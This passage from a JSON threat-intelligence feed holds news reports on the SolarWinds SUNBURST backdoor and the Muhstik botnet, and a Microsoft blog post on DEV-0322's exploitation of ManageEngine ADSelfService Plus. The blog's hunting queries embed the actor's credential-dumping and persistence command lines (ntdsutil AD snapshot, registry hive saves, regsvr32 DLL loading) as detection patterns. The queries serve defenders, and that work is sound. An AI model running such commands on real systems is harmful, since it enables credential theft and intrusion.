"impactScore": 5.9}, "published": "2022-01-18T05:13:00", "type": "thn", "title": "Zoho Releases Patch for Critical Flaw Affecting ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44757"], "modified": "2022-01-18T10:03:19", "id": "THN:A29E47C7A7467A109B420FF0819814EE", "href": "https://thehackernews.com/2022/01/zoho-releases-patch-for-critical-flaw.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:41", "description": "[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2021-11-09T18:22:59", "description": "Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.\n\nMSTIC previously highlighted DEV-0322 activity related to [attacks targeting the SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.\n\nOur colleagues at Palo Alto Unit 42 have also highlighted this activity in [their recent blog](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>). We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in [Black Lotus Labs](<https://www.lumen.com/en-us/security/black-lotus-labs.html>) at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.\n\nThis blog shares what Microsoft has observed in the latest DEV-0322 campaign and inform our customers of protections in place through our security products. We have not observed any exploit of Microsoft products in this activity.\n\nMSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## Activity description\n\nMSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.\n\n### Credential dumping\n\nIn this campaign, DEV-0322 was observed performing credential dumping using the following commands:\n\n\n\nDEV-0322 also occasionally deployed a tool to specifically read security event logs and look for Event ID 4624 events. Next, their tool would collect domains, usernames, and IP addresses and write them to the file _elrs.txt_. They typically called this tool _elrs.exe_, and below is an example of how they would call it:\n\n\n\nAfter gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:\n\n\n\n### Installing custom IIS module\n\nThe _gac.exe_ binary installs _ScriptModule.dll_ into the Global Assembly Cache before using _AppCmd__.exe_ to install it as an IIS module. _AppCmd.exe_ is a command line tool included in IIS 7+ installations used for server management. This module hooks into the BeginRequest IIS http event and looks for custom commands and arguments being passed via the Cookies field of the HTTP header.\n\n\n\n_Figure 1: Encoded request from the controller to the victim machine_\n\nThe custom IIS module supports execution for _cmd.exe_ and PowerShell commands. It also provides DEV-0322 with the ability to direct download and upload of files to and from a compromised IIS web server. The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:\n\n_C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat_\n\nIf this module receives the command \u201cccc,\u201d it drops a file _c:\\windows\\temp\\ccc.exe_. The file _ccc.exe_ is a .NET program that launches _cmd.exe_ with an argument and sends any output back to the controller.\n\n\n\n_Figure 2: The Base64-encoded ccc.exe contained inside the IIS module backdoor_\n\nBelow is an example command from _w3wp.exe_ process after _ccc.exe is_ dropped:\n\n`\"c:\\windows\\temp\\ccc.exe\" dir`\n\n### Deploying Zebracon malware\n\nIn addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.\n\nSubsequent commands are made to _&lt;ZimbraServer&gt;/service/soap_ using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:\n\n * Search email (e.g., _&lt;query&gt;(in:\\&quot;inbox\\&quot; or in:\\&quot;junk\\&quot;) is:unread&lt;/query&gt;_)\n * Read email\n * Send email (e.g., _Subject: __[AutoReply] I&#x27;ve received your mail, I will check it soon!_)\n\nThese operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.\n\nFiles related to the Zebracon Trojan have the following metadata:\n\n * Company name: \n * Synacor. Inc.\n * File description: \n * Zimbra Soap Suites\n * Zimbra Soap Tools\n * Internal name: \n * newZimbr.dll\n * zimbra-controller-dll.dll\n * Original filename: \n * newZimbr.dll\n * ZIMBRA-SOAP.DLL\n\nMicrosoft will continue to monitor DEV-0322 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Detections\n\n### Microsoft 365 Defender detections\n\n**Antivirus**** **\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Trojan:MSIL/Gacker.A!dha\n * Backdoor:MSIL/Kokishell.A!dha\n * Trojan:Win64/Zebracon.A!dha\n\n**Endpoint detection and response (EDR)**** **\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * DEV-0322 Actor activity detected\u200b\n * Malware from possible exploitation of CVE-2021-40539\n\nThe following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:\n\n * &#x27;Zebracon&#x27; high-severity malware was detected\n * Anomaly detected in ASEP registry\n\nMicrosoft 365 Defender correlates any related alerts into [incidents](<https://docs.microsoft.com/microsoft-365/security/defender/investigate-incidents?view=o365-worldwide>) to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.\n\nThe threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.\n\n### Microsoft Sentinel detections\n\nThe indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the _Microsoft Emerging Threat Feed_ located in the [Microsoft Sentinel Threat Intelligence blade](<https://docs.microsoft.com/azure/sentinel/understand-threat-intelligence>). These can be used by customers for detection purposes alongside the hunting queries detailed below.\n\n## Advanced hunting queries\n\n### Microsoft Sentinel hunting queries\n\n**Name**: DEV-0322 Command Line Activity November 2021 \n**Description**: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor&#x27;s post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml>\n\n**Name**: DEV-0322 File Drop Activity November 2021 \n**Description**: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor\u2019s post-exploitation activity. The query uses other additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml>\n\nIn addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:\n\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021-MSIM.yaml>\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021-MSIM.yaml>\n\n### Microsoft 365 Defender hunting queries\n\n**Name: **Surface devices with the CVE-2021-40539 vulnerability \n**Description: **Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA2WQuw6CQBBFT23iP2yoNb4LCyqwsFETjT3iEjQgBlAaP967FkqwmJ27N7NnZjbE8uRCrHyQytlTkFDTEFHKPfIg4yZVyjmpNlPUCkuFoU-PFyPTkH5qrHQgkmXNWdrH1-kRiLRiyJSxYiI1l1owY4n35RjuYhRc9T5WF0PYmtARBx1vo6lyZef_-rrbVrvsNG0kTiJmqTrndzdsE_63dztV6lXoD949nbyNLgEAAA&timeRangeId=week>).\n\n`DeviceTvmSoftwareVulnerabilities \n| where CveId == \"CVE-2021-40539\" \n| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion`\n\n**Name: **Hunt for suspicious dropped files post-exploitation \n**Description: **Look for suspicious files dropped the the threat actor\u2019s post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA41T20rDQBCdZ8F_WPrUQmzelT6U1EKhSlHfVKSm6T1JyUZrwI_3zMmGJlGhLNmZneuZS3zxxchUUpwduCVoBprLWiJQKwfQUDbQbEAN6R4yC34B2xQWarPA-10K55tBMgdncIegGvVSLvAuj0bIW9EGjFhIAp-Y2bryLB0J5FpecGbMtsKt-hHjz6m5o7VqLb4l5CoNICmATbPr-0EeZUhuh4yF9JGtxNgRj3foMh0RL4E2BWcpyeERI5byIU8fki98HXmVntw0qhtB_klMkYxdhbeQRIiaI2Ld9hvfkd3O2PHK_p5VqiQiFktU2ltFGsEmg-yEwrjJjUH3sNd4M9anHmtwVt5wJ5xRt9b5XgOPz42YwC50U7REUW1EBj_LXbGwSB1q7brhO8aZE3E5-5A5LDu6qk1ctXvOyzCDVtnuyxZa9TPIV05kQN8lZ_rBqWSspt7xck-qvOf2vekVNCqZMnvkKky4dyqxbmtiVuvz__g9mR77k7T2YgKfNp4DMWz5x-VyRWTa4YWr8wm-MRHm3I4D97Yetdoa749N8v7ZDu_M6j23F7qFG_qWM236DjlznY72qcr9A2VPOedoBAAA&timeRangeId=week>).\n\n`// Look for the specific files dropped by threat actor \nlet files = dynamic([\"C:\\\\ProgramData\\\\Microsoft\\\\Crypto\\\\RSA\\\\key.dat \", \"c:\\\\windows\\\\temp\\\\ccc.exe\"]); \nDeviceFileEvents \n| where FileName endswith \"elrs.exe\" or FolderPath has_any (files) \n// Increase the risk score of command accessing file also seen \n| join kind=leftouter (DeviceProcessEvents \n| where ProcessCommandLine contains \"cmd /c elrs.exe\") on DeviceId \n| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName`\n\n**Name: **Hunt for command lines observed used by the DEV-0322 actor \n**Description: **Look for suspicious command lines that are used as part of the threat actor&#x27;s post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA71W72_SUBS9n038H8i-wAyDRM0-zGCic8uIsJixmJg5CbQd1NGCtMBm_OM997xXaaHFitE09N333v31zj33laY0pSIdmeK5h3SHcY7RwRjgGUgoLuYT8SF5EkGeyhCjB70l3rq74FyloTziHcsYczPOIQ0gVfB2MKr_p_IEc_NMsB8zYgAP_UykFn4uPIawDbDuSE1upGp1G9B6YJwmVipyICurpSshIrnYPWEGro1uspxhbYq5RokYe4C4E0pJvh49hpBc6Cww-tSImM0M4xg-NPPPeA6sfx-YJNZ6jgiyYuhwJfFmLDajfUMUnx7X0mtqndBiRY8uoq6sD7ULkIvK6rvBc8bw_Qoo1WFbZYQR9JeQXshzYhOV9rqwlT6Wl_SuKCWei1HcxtFULKlUudgjYrqu8hG0i23Tlj3G9zGLpUseLMiz5ASKa7kcYkprXKtyK4dAN83gd9BfkneefMhgcsYO0cpEGYtmQdcZtsSWwwlm6Y5I-jHbFdqTITHSeqn2CLKpvKKXjv0DvxX7c06LbManmb7v2MgV6A-w2-e6dngtp18Pmce8tM-AZ3WYS5TJVxkTYXdJvQt5D6uurewn_K6BbBc7N_IF71t5hjx6yCuytWvApi0f2WMmozZi-kTW4KsI_YuT7x_n_-CxyQS92Uw22i_f6V_v_gVZW8PJtNfPsTentx40lNEtMi-ExjXGgBnH5OPM2nSI29rC3OYa6aHAKvl6pPupDYzqG2uXtPC4XgZb1XsDnfW50h7Oea9nve5bxXK2-0UsPsGf2vag4-bcR29ZMY_M8yHdkx8Ome3ZO0a_YcqYIe8PXbv7zb-F6Ff9k1vO470-Zm9NyYBNVirnY1qptyubTS-VSyvD0_6WB_Nt-gpd_Sof0UptXZt3HqfzWFvPjb-LkXns_TuW7kYn3uokg07--bIRTvm9iJnPGVeUR4_WQzHjLmzddtvnIfQTp42GkHAKAAA&timeRangeId=week>).\n\n`// Look for command lines observed used by the threat actor \nlet cmd_lines = dynamic(['cmd.exe /c \"wmic /node:redacted process call create \"ntdsutil snapshot \\\\\"activate instance ntds\\\\\" create quit quit > c:\\\\windows\\\\temp\\\\nt.dat\";', 'regsvr32 /s c:\\\\windows\\\\temp\\\\user64.dll', 'process call create \"cmd /c c:\\\\windows\\\\temp\\\\gac.exe -i c:\\\\windows\\temp\\\\ScriptModule.dll >c:\\\\windows\\\\temp\\\\tmp.dat\"']); \nDeviceProcessEvents \n// Look for static cmd lines and dynamic one using regex \n| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" \n| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid \n// Base risk score on number of command lines seen for each host \n| extend RiskScore = count_ \n| project-reorder FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName \n| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName`\n\n## Indicators of compromise (IOCs)\n\nType | Indicator \n---|--- \nSHA-256 | bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5 \nSHA-256 | e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e \nSHA-256 | 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b \nSHA-256 | a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2 \nSHA-256 | d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16 \nSHA-256 | 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090 \nSHA-256 | ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6 \nSHA-256 | b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665 \nSHA-256 | b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710 \nSHA-256 | bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da \nSHA-256 | 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59 \nSHA-256 | f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e \nSHA-256 | 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428 \nSHA-256 | 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058 \nSHA-256 | b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b \n \n \n\nThe post [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-11-09T00:24:55", "type": "mmpc", "title": "Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:24:55", "id": "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "href": "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T21:30:14", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and 